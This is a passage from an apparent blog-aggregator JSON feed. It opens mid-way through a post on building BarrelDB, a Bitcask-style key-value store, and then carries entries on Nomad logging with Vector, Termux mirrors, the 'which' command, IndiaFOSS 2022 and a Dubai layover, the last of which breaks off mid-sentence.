KeyDir. An important point to note here is that the value is never stored in this map. This makes it possible for Bitcask to handle datasets more significant than what the RAM can hold.\n\u002F\u002F KeyDir represents an in-memory hash for faster lookups of the key.\n\u002F\u002F Once the key is found in the map, the additional metadata, like the offset record\n\u002F\u002F and the file ID is used to extract the underlying record from the disk.\n\u002F\u002F Advantage is that this approach only requires a single disk seek of the db file\n\u002F\u002F since the position offset (in bytes) is already stored.\ntype KeyDir map[string]Meta\n\n\u002F\u002F Meta represents some additional properties for the given key.\n\u002F\u002F The actual value of the key is not stored in the in-memory hashtable.\ntype Meta struct {\n    Timestamp  int\n    RecordSize int\n    RecordPos  int\n    FileID     int\n}\nHere, RecordPos tells the record’s position offset (in bytes) in the entire file. Since the position of the record is stored in memory along with the key, the retrieval of the key doesn’t require more than a single disk seek. Bitcask achieves really low latency even with many keys in the database. A file system read-ahead cache also helps boost the performance and comes for free - no need to design a separate caching mechanism.\n\nCompaction#\nAs we looked at previously, a datafile is simply an append-only sequence of writes. Any modification of the key is merely a new record appended to the datafile. KeyDir overwrites the entry of the key with the new metadata, which contains the new location of the record. Thus all reads will automatically return the updated value.\nDeletes are handled similarly by writing a “tombstone” record for the key. When the user requests the key after it’s been deleted, BarrelDB can check whether that value equals the tombstone value and return an appropriate error.\nAs you would have guessed, our database will grow unbounded if we don’t perform any garbage cleanup. The datafiles need to be pruned for deleting expired\u002Fdeleted records and merging all stale files in a single active file - to keep the number of opened files in check. All of these processes are together called “Compaction”.\nLet’s take a look at how each of these compaction routine works under the hood:\nMerge#\nThe merge process iterates over all the keys inside KeyDir and fetches their value. The value could come from a stale file as well. Once the new keys\u002Fvalues are updated, it writes them to a new active file. All the old file handlers are closed, and the stale files are deleted from the disk. The KeyDir is updated similarly since the new records live in a different position\u002Ffile.\nHints File#\nBitcask paper describes a way of creating a “hints” file initially loaded in the database for faster startup time. This file is essential to bootstrap KeyDir after a cold startup. This avoids iterating over all data files and reading their values sequentially. In BarrelDB, gob encoding is used to dump the KeyDir map as a gob dump.\n\u002F\u002F generateHints encodes the contents of the in-memory hashtable\n\u002F\u002F as `gob` and writes the data to a hints file.\nfunc (b *Barrel) generateHints() error {\n    path := filepath.Join(b.opts.dir, HINTS_FILE)\n    if err := b.keydir.Encode(path); err != nil {\n        return err\n    }\n\n    return nil\n}\nDuring the startup, BarrelDB checks the presence of a .hints file, decodes this gob dump, and loads the data in KeyDir.\nRemoving expired keys#\nA goroutine runs at a configurable interval to check if the value of the key has expired. If it has, it deletes the entry from KeyDir. During the following merge process, since this entry won’t be present in KeyDir, it’ll automatically be removed when the new datafile is created.\nTo check if the key has expired, a simple check, like comparing their timestamps in UNIX epoch format, is enough: time.Now().Unix() > int64(r.Header.Expiry).\nRedis Server#\nIn addition to using BarrelDB as a Go library, I also implemented a redis-compatible server. I found tidwall\u002Fredcon as an easy-to-use library to create a Redis-compatible server for Go applications. All I’d do was wrap BarrelDB API methods and define handlers for SET \u002F GET.\nI was able to use redis-cli and connect to the BarrelDB server:\n127.0.0.1:6379> set hello world\nOK\n127.0.0.1:6379> get hello\n\"world\"\nBenchmarks#\nYou can check the repo for the actual benchmarks. However, I’d like to point out some inferences of the results from redis-benchmark.\nFirst, let’s send 100000 requests to the server using 50 parallel clients. This command creates a unique key for each SET operation.\nredis-benchmark -p 6379 -c 50 -t set -n 100000 -r 100000000\n\nSummary:\n  throughput summary: 145985.41 requests per second\n  latency summary (msec):\n          avg       min       p50       p95       p99       max\n        0.179     0.016     0.183     0.207     0.399     1.727\nSo, 140k requests per second is not bad at all for a disk-based KV. But the exciting thing to note here is that the performance is predictable even if you increase the load by increasing clients:\nredis-benchmark -p 6379 -c 200 -t set -n 100000 -r 100000000\n\nSummary:\n  throughput summary: 140845.08 requests per second\n  latency summary (msec):\n          avg       min       p50       p95       p99       max\n        0.718     0.224     0.711     0.927     1.183     5.775\nIf we increase the number of requests (by 5x) as well, the throughput looks almost the same:\nredis-benchmark -p 6379 -c 200 -t set -n 500000 -r 100000000\n\nSummary:\n  throughput summary: 138350.86 requests per second\n  latency summary (msec):\n          avg       min       p50       p95       p99       max\n        0.748     0.056     0.711     0.879     1.135    63.135\nThis magic is all because of the way Bitcask uses Log structured hash table (just append-only records for writing data). Even with a lot of records, all it has to do is to write to the end of the file, which avoids any expensive I\u002FO operations.\nSummary#\nOverall, I am happy with BarrelDB implementation as I covered everything described in the paper. This project had excellent learning outcomes for me. I spent a lot of time coming up with a design for structuring different components and their API methods and handling all the edge scenarios during the compaction process. Although, full credit to Bitcask as it kept its design so elegant and minimal yet achieved some significant numbers in the benchmarks. This is also a reminder that simple need not necessarily mean less powerful.\nI look forward to implementing a distributed KV store by adding support for multiple BarrelDB nodes connected via Raft. For now, gonna enjoy some chai and release this project to the WWW :)\nFin!",[],{"slug":1454,"title":1455,"link":1456,"pubDate":1457,"contentSnippet":1458,"tags":1459,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"updated-gpg-keys","Announcement: I updated my gpg keys","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fupdated-gpg-keys\u002F","Sat, 19 Nov 2022 16:01:36 +0530","I updated my gpg keys because I had a 3072 bits RSA key and Debian requires 4096 bits RSA or elliptic curve. The key fingerprint is:\nFF7D B951 7CE1 E19B 6EFE 695F E0E5 BAFD 3BBF 70B3\nCheck my gpg page for details.\nSo, if you are from Debian community and signing someone else’s keys which they will be using for the purposes of debian, make sure they are using a 4096 bit RSA key or an elliptic curve key.",[],{"slug":1461,"title":1462,"link":1463,"pubDate":1464,"contentSnippet":1465,"tags":1466,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"web2-web3","But, aren't you folks web2?","https:\u002F\u002Fnadh.in\u002Fblog\u002Fweb2-web3\u002F","Tue, 15 Nov 2022 00:00:00 +0000","It took me several seconds to parse the casual quip “But, aren’t you folks web2?”. I probed further and they continued—“Isn’t Zerodha[1] web2? Why don’t you convert it to web3?”. For the next few minutes, I struggled to explain how technologies, processes, people, regulations, laws, industry, and the entire legal and societal foundation that underlie an organisation, no matter how imperfect, aren’t “web2”, and that they can’t just be converted to “web3”, whatever that meant. To my question as to why they called a whole bunch of things web2 and why they think it should be converted to web3, they didn’t have an answer. This interaction happened a few months ago with a young developer in their early twenties working for an American web3 startup. Since then, I have had a few more interactions including a few startup pitches, all eerily similar. All young people in their early twenties right out of college working on web3 things, all dismissive of everything non-web3 as web2. This conversation came up again this week in light of the new meltdowns unraveling[2] in the crypto world.",[],{"slug":1468,"title":1469,"link":1470,"pubDate":1471,"contentSnippet":1472,"tags":1473,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"intro-to-fediverse","Introducing Fediverse: A Decentralized Social Media","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fintro-to-fediverse\u002F","Sat, 29 Oct 2022 14:44:56 +0530","Finally, Elon Musk is the owner of Twitter. On the first day after the takeover, Twitter has already undergone some major changes. If you are wondering what the big deal is, here is a reminder that tech giants work for profit and control, rather than to make the world a better place. While I do not consider the previous CEO of Twitter to be good, the takeover by Musk may have made people more receptive to the ideas I am going to discuss.\nThis is a problem of centralization\nCentralized services such as Twitter are vulnerable to such handovers. Even if the company is good today, it may get compromised in future due to change of ownership. The same thing happened with WhatsApp. After Facebook took over WhatsApp, it later introduced a policy to share data of WhatsApp users with Facebook.\nIntroducing Fediverse\n\nFediverse logo\nFediverse is NOT another company or a startup, rather a community made project.\nFediverse is a decentralized social network, where users using different services can follow, boost posts, and communicate with each other, similar to how users with accounts on different email providers can email each other. Different services on Fediverse have different policies, so you can choose a service which suits your needs. Anyone can self host their instance of Fediverse, or pay someone to host for them(just like any task in the world). There is no single company or person who owns Fediverse, rather different instances have different admins, usually running service in their free time, so don’t forget to send them a donation if you like the service. Fediverse users do not get tied to a particular service, as when they change their service providers, they can migrate their friends and followers, so they don’t need to start from scratch again.\nFediverse is a collection of different types of services. For example, Mastodon is like Twitter(according to use-case), Friendica is like Facebook, Pixelfed is for sharing images, similar to Instagram, and PeerTube is for sharing videos, a replacement for YouTube.\nEach service on Fediverse is free software which means you can add features youself as well. For example, let’s say Mastodon does not have a feature and you would like to add it, then you have the ability to run your modififed version of Mastodon on your server as well. You can pay someone to add that feature too, or you can collaborate with others who like the same feature and colectively crowdfund to add that feature.\nYou can learn more about Fediverse here. Further, this is a good unofficial guide to get started. We need to fight for our freedom. You can take a step by deleting your Twitter account, or just trying out Fediverse and bring your friends on Fediverse to reduce your dependence on Twitter, Facebook and Instagram. I suggest major organizations (which usually have resources) to switch to Fediverse, which will raise awareness about it to their users. If they don’t feel like deleting their Twitter account, Fediverse can reduce their dependence on it and, hopefully, more users will join.\nMy profile on Fediverse is here. Feel free to connect.\nFor further reading on this topic, check out this blog post by Free Software Community of India.",[],{"slug":1475,"title":1476,"link":1477,"pubDate":1478,"contentSnippet":1479,"tags":1480,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-27","A Clojure view of \"Mars Rover\"","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fclojure-mars-rover\u002Findex.html","Wed, 19 Oct 2022 00:00:00 +0000","Here I illustrate how Clojurists (including Yours Truly) like to solve problems and model things using hammocks, pure functions, and the \"it's just data\" ideology. Also, while the *problem* focuses on \"design in the small\" of application logic, many ideas in the *solution* can—and do—scale all the way to \"design in the large\" of whole systems.",[52,456,531,530],{"slug":1482,"title":1483,"link":1484,"pubDate":1485,"contentSnippet":1486,"tags":1487,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"couldnt-attend-libreoffice-conference","Couldn't Attend Libreoffice Conference 2022 in Italy","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fcouldnt-attend-libreoffice-conference\u002F","Tue, 04 Oct 2022 19:29:56 +0530","This year, The Document Foundation (TDF) invited me to attend the LibreOffice conference in Milan, Italy. In order to travel to Italy, I needed a visa.\nTo apply for the same, I had to book an appointment with VFS Global and submit the required documents. The conference was to be held from the 28th of September to the 1st of October 2022. I started checking for visa appointments on the 10th of August. However, I got no available slots in Delhi. I also checked the availability of appointments in other cities. I saw appointments were available in Kolkata, which is pretty far from where I live, and I didn’t want to spend that much time and money for the visa.\nAfter looking up for appointments at the VFS Delhi center for 8 consecutive days, I got one for the 22nd of August. During my appointment, I was informed by the staff that I had applied in the wrong category - tourist. They told me further that if my purpose of travel is to attend a conference, then the category of application should be “business” or “invitation.” Therefore, I was advised to book another appointment in the correct category. It was not a visa refusal. I didn’t get to pay for my visa fee or submit my documents.\nI tried to book another appointment in the correct category meant for attending conferences, but didn’t get any slots for days, and so I finally gave up in mid-September and told the conference organizers that I wouldn’t be able to join.\nFinally, I would like to end this post by thanking TDF for inviting me to the conference and offering to sponsor my costs. It is unfortunate that I could not attend.",[],{"slug":1489,"title":1490,"link":1491,"pubDate":1492,"contentSnippet":1493,"tags":1494,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"nomad-logging","Logging on Nomad with Vector","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fnomad-logging\u002F","2022-09-03T18:40:55.000Z","Application orchestrators like Nomad, Kubernetes etc., allow you to deploy multiple applications on the same host. Logs are stored on the underlying node wherever the applications are run. However, it’s pretty common to treat these instances as ephemeral if they’re a part of an autoscaling group. Therefore depending on the node’s availability to search these logs is not a practical idea as the node can go down anytime. Moreover, in most cases, access to these nodes is limited to cluster administrators, not the maintainers (developers\u002Fapplication owners). In such cases, a log shipping agent must ship and aggregate logs from all cluster nodes and store them centrally (like Elasticsearch, Clickhouse, Loki).\nI’d recommend reading this excellent post by Adrian, who has explained how to set up a Vector logging pipeline for applications running with docker task driver and ship the logs to Loki. For the applications running using docker task driver, Nomad piggybacks to docker daemon for configuring logging options. Docker daemon supports many logging options; in my experience, the journald log driver works reliably well.\nHowever, this post is about tasks not using docker but any other driver (e.g. raw_exec and exec). Nomad doesn’t provide many configuration options for logging for these drivers. The biggest issue is that Nomad logs the application’s stdio\u002Fstderr stream to the log directory as-is without annotating any metadata about the task. This means that if you’ve multiple applications running on one host, the log shipping agent will not be able to identify which application’s logs are being ingested.\nConsider this as an example. We’re running a simple web server using exec driver:\njob \"http\" {\n  datacenters = [\"dc1\"]\n  type        = \"service\"\n\n  group \"app\" {\n    count = 1\n    network {\n      mode = \"bridge\"\n      port \"python-http\" {\n        to = \"8888\"\n      }\n    }\n\n    task \"server\" {\n      driver = \"exec\"\n\n      config {\n        command = \"\u002Fusr\u002Fbin\u002Fpython3\"\n        args    = [\"-m\", \"http.server\", \"8888\"]\n      }\n    }\n  }\n}\nOnce the alloc is running, we can find its IP address using:\nnomad alloc status 1d05d64b | grep -A 3 'Allocation Addresses'\nAllocation Addresses (mode = \"bridge\")\nLabel         Dynamic  Address\n*python-http  yes      192.168.29.76:31775 -> 8888\nOn sending an HTTP request using cURL we can see the logs that this webserver generated:\ncurl -i 192.168.29.76:31775\nHTTP\u002F1.0 200 OK\nServer: SimpleHTTP\u002F0.6 Python\u002F3.10.4\nDate: Sun, 04 Sep 2022 06:18:45 GMT\nContent-type: text\u002Fhtml; charset=utf-8\nContent-Length: 869\n...\nNomad stores the logs inside the applications’ allocation directory, inside \u002Fopt\u002Fnomad\u002Fdata\u002Falloc. To see the logs for the above allocation ID, we can use:\ntail -f \u002Fopt\u002Fnomad\u002Fdata\u002Falloc\u002F1d05d64b-4b59-3c65-8261-760499d9e4f6\u002Falloc\u002Flogs\u002Fserver.stderr.0tail -f server.stderr.0 \n192.168.29.76 - - [04\u002FSep\u002F2022 11:48:26] \"GET \u002F HTTP\u002F1.1\" 200 -\n192.168.29.76 - - [04\u002FSep\u002F2022 11:48:45] \"GET \u002F HTTP\u002F1.1\" 200 -\nEnriching logs with metadata#\nAs you can see, these logs are precisely what the python3 -m http.server command generates. Ideally, Nomad should have enriched these logs with metadata about the allocation ID, job name, namespace, the node it’s running on, etc., as noted in this GitHub issue.\nHowever, since that’s not yet available, I brainstormed a few different options:\nApproach 1: Sidecar#\nThe first approach was to run vector as a sidecar next to the main task. This is the simplest option, to begin with. Vector can be independently configured to add metadata for the logs collected from the allocation directory of the group. However, as with every sidecar deployment, there’s a lot of extra resource usage. For every 10 different groups, reserving resources for 10 vector agents quickly eats up your available CPU\u002FMemory of the underlying node. A more critical downside, though, was asking every developer to also configure a Vector sidecar job. And to keep all these configs in sync to ensure they’re unified across namespaces is also another headache. Due to these reasons, I discarded this option early on. However, suppose your deployment scale (managing applications) is relatively smaller. In that case, this is actually not a bad idea.\nApproach 2: Events Stream#\nMy next option was to listen to the Nomad events stream and generate a “vector” configuration template to collect logs and enrich them with metadata from the Events Stream. I developed v0.1 of nomad-vector-logger based on this concept. Since I’ve written a wrapper to collect events from Nomad using nomad-events-sink it was relatively straightforward to extend it to generate a vector.toml config. However, after testing in prod for a few days, I noticed that relying on the events stream is unreliable. Nomad events are not WebSocket based (as of yet). It’s a simple long polling mechanism which sends events to a Go channel as and when they happen. What happens when you miss an event? What happens when you run nomad system gc, which clears the events index? These were some of the challenges I faced with this v0.1 approach. There needs to be some sort of “reconcile” mechanism that periodically runs. A reconciliation loop that lists all allocations using the HTTP API can help whenever there are missing events.\nApproach 3: Enrichment Tables#\nI also posted about the above program in Vector’s discord group (they’re super active+helpful folks) and discussed this daemon with them. They also suggested a simpler alternative: generating a CSV of running allocations instead of a .toml config. Vector has support for Enrichment Tables which means that it can “lookup” a CSV file to find a particular row and enrich the log event with the information found from the CSV. This seemed a super cool idea, and I developed v0.2 using this. Super thankful to Vector maintainers for giving me this idea!\n\n\nHowever, this approach had a few “subtle” drawbacks that I found:\nvector doesn’t support live-reloading if the CSV file changes. vector has support for watching a config file for changes or sending a SIGHUP to reload. However, that only works for vector’s own config files. Since the CSV file is an external file, vector cannot watch it for changes. I came up with an ugly bash script hack and compared the md5 hash of the file in a while loop and if it changed, then send a SIGHUP to vector. All I can say is it’s ugly, but it works. If you wish to see it, it’s available here in all it’s glory.\nThe most significant issue was the chance of losing logs for the initial 10-20s of a new allocation. The above shell script had a sleep(10) because md5sum can be a bit CPU intensive to keep frequently doing. Vector sees a new allocation and starts ingesting events. It tries to look up the CSV row by the allocation ID, but it doesn’t find it yet in the CSV file, complains about it, and drops the log event. Thus, I had to drop the CSV idea in search to find another more reliable approach to this. For people interested in this approach, you can checkout the csv branch here.\nApproach 4: Periodic Reconciliation Loop#\nThe final v0.3.0 solution, which IMHO fixed all the above issues, was:\nSkip Nomad events stream. Since I have to build a reconciliation loop anyway, listening to events is just extra work without tangible benefits.\nI used a background Goroutine channel to periodically refresh the list of allocations running on that node. Even if I fetched this list once every 30s or so, it’s OK because Vector will start ingesting logs once the config gets generated. It will start reading the file from the beginning. So logs aren’t lost even if I templated the config much later after the alloc began running.\nI added the support to delay the removal of allocation from the file. If an allocation is stopped (e.g., a new version is deployed or the job restarted), the program doesn’t immediately removes the allocation from the config file. The user can set a delay period which works like a cooling down period. In this period, one can assume that Vector would have finished sending all logs to the upstream. In case the application generates too many logs faster than what the upstream sink can accept (e.g. if the upstream Elasticsearch gets slower). Suppose we remove the allocation _immediately whenever it stops. In that case, there’s a probability that Vector wouldn’t have read the file to the end. This cooling period helps to ensure that doesn’t happen. This is not a fool-proof situation but should cover most cases unless the upstream sink is dead for many hours.\nHow it works#\nNow that we’ve covered a few different approaches and the pros\u002Fcons of each let’s see how nomad-vector-logger works. Essentially nomad-vector-logger is meant to be deployed inside a Nomad cluster as a system job. A system job in Nomad runs on each node. Whenever a new node gets added to the cluster, Nomad’s scheduler schedules a copy of this program on that new node automatically. This is the equivalent of a “Daemonset” in K8s.\nnomad-vector-logger uses Nomad’s HTTP API to query all nodes’ running allocations. Once it gets the list, it adds it to an internal map and signals to generate a config.\nThe final config that is templated out looks like this:\n[sources.source_nomad_alloc_64a2f9fd-e003-0bb3-b5cd-838125283a06_proxy]\ntype = \"file\"\ninclude = [ \"\u002Fopt\u002Fnomad\u002Fdata\u002Falloc\u002F64a2f9fd-e003-0bb3-b5cd-838125283a06\u002Falloc\u002Flogs\u002Fproxy*\" ]\nline_delimiter = \"\\n\"\nread_from = \"beginning\"\n\n[transforms.transform_nomad_alloc_64a2f9fd-e003-0bb3-b5cd-838125283a06_proxy]\ntype = \"remap\"\ninputs = [\"source_nomad_alloc_64a2f9fd-e003-0bb3-b5cd-838125283a06_proxy\"]\nsource = '''\n# Store Nomad metadata.\n.nomad.namespace = \"default\"\n.nomad.node_name = \"pop-os\"\n.nomad.job_name = \"nginx\"\n.nomad.group_name = \"nginx\"\n.nomad.task_name = \"proxy\"\n.nomad.alloc_id = \"64a2f9fd-e003-0bb3-b5cd-838125283a06\"\n'''\nFor people unfamiliar with vector, it’s essentially doing 2 things:\nGet logs from a “file” source. The file path comes from nomad-vector-logger (where all the logs for proxy task are located)\nIt adds a JSON object nomad with relevant keys.\nVector pipeline will send this event to another “transformer” which can further process the log event (for eg parsing it as logfmt or JSON etc) and then finally send it to an upstream sink like Loki\u002FElasticsearch etc.\nHere’s an example of the before\u002Fafter of a log line shown above in this post:\nBefore#\n\nAfter#\n\nPerfect! We’ve annotated the same log event with Nomad metadata, and Vector will be able to identify these logs. If you’re interested in a complete setup on deploying this to Nomad, take a look at dev setup which contains a Nomad jobspec to deploy nomad-vector-logger as a sidecar with vector as the main task.\nHope this post helped you start configuring a logging pipeline for applications running with non-docker task drivers.\nFin!",[],{"slug":1496,"title":1497,"link":1498,"pubDate":1499,"contentSnippet":1500,"tags":1501,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"triangle-of-fulfilment","The triangle of fulfilment","https:\u002F\u002Fnadh.in\u002Fblog\u002Ftriangle-of-fulfilment\u002F","Mon, 22 Aug 2022 00:00:00 +0000","“It’s 2022. Why hasn’t someone done it already!?”, I find exclaiming  frequently when stumbling upon things and ideas that are relatively simple and so obvious that they should exist, but for some reason, don’t. It is frequently about software, occasionally about physical things, and once in a while, about an organisation that focuses on a certain cause that really ought to exist. It is of course not about hard problems like cold fusion or disease and poverty eradication, but things like … a mailing list manager.",[],{"slug":1503,"title":1504,"link":1505,"pubDate":1506,"contentSnippet":1507,"tags":1508,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"termux-armbian","New Termux and Armbian mirrors live now!","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Ftermux-armbian\u002F","Tue, 16 Aug 2022 07:19:31 +0000","Termux mirror.albony.xyz\u002Ftermux Its added to the termux mirrorlist so you should get it automatically soon, if you want to add it manually:\ntermux-change-repo (part of termux-tools package) can be used to modify sources. Another way of doing it is by using apt edit-sources and adding the following lines:\n# main deb https:\u002F\u002Fmirror.albony.xyz\u002Ftermux\u002Ftermux-main stable main # root deb https:\u002F\u002Fmirror.albony.xyz\u002Ftermux\u002Ftermux-root root stable # X11 deb https:\u002F\u002Fmirror.albony.xyz\u002Ftermux\u002Ftermux-x11 x11 main Armbian mirror.albony.xyz\u002Farmbian This is also added to the armbian mirrorlist but you can also add it manually by editing the sources.",[],{"slug":1510,"title":1511,"link":1512,"pubDate":1513,"contentSnippet":1514,"tags":1515,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"stop-which","Don't use which","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fstop-which\u002F","2022-08-07T18:30:00.000Z","which is a non-standard\u002Fnon-POSIX compliant program. I faced many issues getting which to work in a chroot environment (Nomad).\nSo basically, which is a simple shell script program to find out the dependency by searching the $PATH (which is what makes it less deterministic). It’s also somehow symlinked 3 levels deep in Debian:\n$ ls -laht \u002Fusr\u002Fbin\u002Fwhich\nlrwxrwxrwx 1 root root 23 Apr 26 22:25 \u002Fusr\u002Fbin\u002Fwhich -> \u002Fetc\u002Falternatives\u002Fwhich\n$ ls -laht \u002Fetc\u002Falternatives\u002Fwhich\nlrwxrwxrwx 1 root root 26 Apr 26 22:25 \u002Fetc\u002Falternatives\u002Fwhich -> \u002Fusr\u002Fbin\u002Fwhich.debianutils\nNow, notice this:\n$ which ls\nls: aliased to ls --color=tty\n\n$ \u002Fusr\u002Fbin\u002Fwhich.debianutils ls\n\u002Fusr\u002Fbin\u002Fls\nBoth are the same programs. However, why is the output different? This is because which is apparently a shell built-in zsh, that is why:\n# zsh\nwhich which\nwhich: shell built-in command\n\n# bash\nwhich which\n\u002Fusr\u002Fbin\u002Fwhich\nThe inconsistency happens because zsh treats which as a shell built-in when it’s apparently not one.\nThis article has some more details on why which is bad and how the Debian team is slowly deprecating it from being a part of debianutils anymore.\nWhen I invoked which from inside a Nomad chroot, it complained that I didn’t have \u002Fbin\u002Fsh (because I was using a custom chroot mount). I started looking hard for alternatives because this silly utility already wasted too much of my time.\nWhat to use#\nUse command -v. It’s a shell built-in, so it avoids a dependency on an external binary (unlike which).\nUsage example:#\nif ! command -v aws > \u002Fdev\u002Fnull; then\n        echo \"Can't find 'aws' executable. Aborted.\"\n        exit 1\nfi\nReferences#\nI found the following posts while digging which and its alternatives.\nwhich-not-posix\nwhy-not-use-which-what-to-use-then\nFin",[],{"slug":1517,"title":1518,"link":1519,"pubDate":1520,"contentSnippet":1521,"tags":1522,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"indiafoss-2022","Attending IndiaFOSS 2022","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Findiafoss-2022\u002F","2022-08-06T18:30:00.000Z","On June 28, I received a text from Anand nudging me to submit a CFP for IndiaFOSS. Until then, I’d not planned to attend IndiaFOSS because travelling to participate in a conference didn’t seem enticing. However, the thought of visiting Bangalore (a city where I spent five years before Covid took the joy from our lives) stayed in my mind for the rest of the day. Call it serendipity or just that little external motivation by Anand; I decided to submit a proposal on Self Hosting with Nomad. IndiaFOSS would be the first physical conference I would attend after the pandemic. I love attending conferences because you get to meet and interact with many people (I somehow dislike the term “networking with people” because it’s heavily connoted with marketing\u002Fsales pitches).\nIndiaFOSS is a v2 of a small pilot conference IndiaOS that happened in 2020. Around 650 people attended IndiaFOSS, and the execution scale was much bigger this time. IndiaFOSS is a 100% volunteer-driven conference, yet everything was quite professionally managed. My friend Dhiraj travelled from Chennai to attend the conference, and I hung out with him for most of the next two days.\nFilling our tummies with a scrumptious breakfast of Thatte Idlis, we headed to attend the keynote by Rushabh, who gave an excellent overview of FOSS United and its journey so far. There were a series of exciting talks right after - especially by Kovid, a prolific FOSS contributor from India. Kovid’s software is widely used across the globe. He shared the story of how calibre evolved from a bunch of scripts written to get around Sony’s DRM to become the most sought-after ebook management tool that it is now. I’ve myself used calibre in one of my initial projects(back when I was still learning Python, please don’t judge that codebase). Next was the much-awaited interview of Rudra Saraswat - the 12-year-old whiz kid who’s a primary contributor to Ubuntu Unity Remix and many other projects. The entire auditorium was stunned to witness how this bright young kid manages his studies, extra-curricular and FOSS projects with a laser-sharp focus.\nI spent some time reviewing my slides which were scheduled right after an excellent talk on hpw the Kubernetes release team works -  by Nabarun. I was pleasantly surprised to see many people interested in Self Hosting\u002FNomad. You can check out the slides here.\nIt was time for lunch, and I finally got to meet Vinayak, Bibhas, Gaurav and Raghav with whom I’ve been interacting in a small Discord group since so many months! This is what pandemic years took away from us, sigh!\nAfter lunch, Kailash presented his fantastic talk on languages, dictionaries, and his FOSS project - dictpress. Kailash was anticipating that people would be drowsy after lunch, but I doubt anyone would want to miss this talk. He gave a glimpse of the monumental work done by Datuk KJ Joseph and V. Krishna in the field of dictionaries and how dictpress makes it easier for anyone to host a dictionary website for any language.\nThe rest of the day was spent hanging out in the lobby, meeting fellow hackers, and chit-chatting. I consider myself an introvert, but I guess with developers, I tend to speak up openly because we tend to ignore any small-talks :P. Rainy evenings and a weekend meant all the Peak Bengaluru memes about not finding cabs were experienced first-hand.\nDay 2 had quite a good lineup of talks as well. Krutika shared the designer’s dilemma of contributing to FOSS Projects. Nemo talked about how we could get a FOSS UPI app and touched upon the openness of UPI. We even did an open space around Self Hosting where many of us self-hosted enthusiasts came together and discussed different topics\u002Fproblems we encountered while self-hosting. It was my first time interacting with Abhas, who runs Deeproot Linux. He shared his wisdom and experiences from self-hosting email servers, media servers and just about anything. I was pretty motivated by his dedication.\nThe best part about IndiaFOSS was that this wasn’t a conference meant just for techies. The talks highlighted every domain of FOSS- policy, design, languages, and hardware rather than just keeping it limited to software. I was happy to see a conference not peddled with any “corporate” product talks. This is what all FOSS conferences should look like, I guess?\nI look forward to attending (and hopefully volunteering) next year’s conference!\n\nFin",[],{"slug":1524,"title":1525,"link":1526,"pubDate":1527,"contentSnippet":1528,"tags":1529,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"reflections-on-indiafoss-2022","Reflections on IndiaFOSS 2.0","https:\u002F\u002Fnadh.in\u002Fblog\u002Freflections-on-indiafoss-2022\u002F","Mon, 01 Aug 2022 00:00:00 +0000","IndiaFOSS 2.0[1], the second edition of the conference organised by the FOSS United Foundation, of which I am a part of, was held in Bengaluru on the 23rd and 24th of July. Previously named IndiaOS, the first edition that ran in January 2020 was an experiment that turned out to be a small, nice gathering of ~100 people in a small hall in a corner of JP Nagar, a residential area in South Bengaluru. There were talks, discussions, and food. It was nice. The conference was meant to be a yearly affair, which the COVID fiasco stalled, like a billion other human affairs.",[],{"slug":1531,"title":1532,"link":1533,"pubDate":1534,"contentSnippet":1535,"tags":1536,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"layover-in-dubai","A budget layover in Dubai","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Flayover-in-dubai\u002F","Sun, 31 Jul 2022 13:19:11 +0530","A few days ago, I had a layover in Dubai while returning from a fun DebConf in Kosovo. The layover was a bit longer than 24 hours. I was joined by my friend Abraham Raji, who had to go to Kochi, and had a layover of around 22 hours.\nSince my layover was longer than 24 hours, I needed a transit visa for boarding my Dubai to Delhi flight. For layovers less than 24 hours, the transit visa was not a requirement for boarding the next flight. Note that you just need to fill a form online to obtain a transit visa for UAE. Since my travel agent booked the flights, they took care of the transit visa on my behalf for a fee of 2,000 INR.\nMy flight from Tirana landed at the Terminal 2 of the Dubai airport at around 21:30 local time. Since I had a transit visa, my plan was to roam around in Dubai and return to the airport to catch my connecting flight. Therefore, I went through immigration. The officer had a lok at my visa and stamped the UAE entry stamp on my passport. Then I went through customs and came out at the Arrivals section of the airport, where I took a seat. It was around 22:00 hours local time.\nThe airline handed over my checked-in luggage - a heavy trolley bag - at the Dubai airport even though my connecting flight was with the same airline FlyDubai. Perhaps, it was because my layover was more than 24 hours long. The airline staff at Tirana only issued my boarding pass till Dubai. However, Abraham got his boarding passes till Kochi and he would get his luggage directly in Kochi.\nI asked around but couldn’t find any cloak rooms to put my luggage. Soon Abraham joined me and I got to know he also has plans to roam around in the city.\nAt the airport, Abraham met a person whom he was talking in Malayalam. That person recommended that we withdraw at least 200 dirhams or AED (around 4,000 INR) in cash from ATM in order to roam around the city. Therefore, I withdrew 200 AED in cash.\n\n      \nDirham notes of denominations 10, 20, 50, 100.\nWe planned to spend the night at the airport and roam around in the city in the morning. We didn’t book a hotel and instead planned to sleep on the benches in the arrivals. I was hungry as I didn’t have lunch in my Tirana to Dubai flight, due to the lack of lacto-ovo vegetarian options on the flight. Therefore, I took a banana from the Costa Coffee shop located next to where we were sitting for 6 AED (equivalent to 120 rupees).\nUnable to sleep, we came out of the airport in search of a place to eat. It was midnight and all the shops were closed. We were suggested by someone to check whether the McDonald’s inside the departures section was open. I was not sure whether we can just go inside the departures, as this is not allowed at Indian airports, unless you are catching a flight.\nWe met a lot of Indians and we asked where can we go for dining. One of them claimed that a restaurant near the 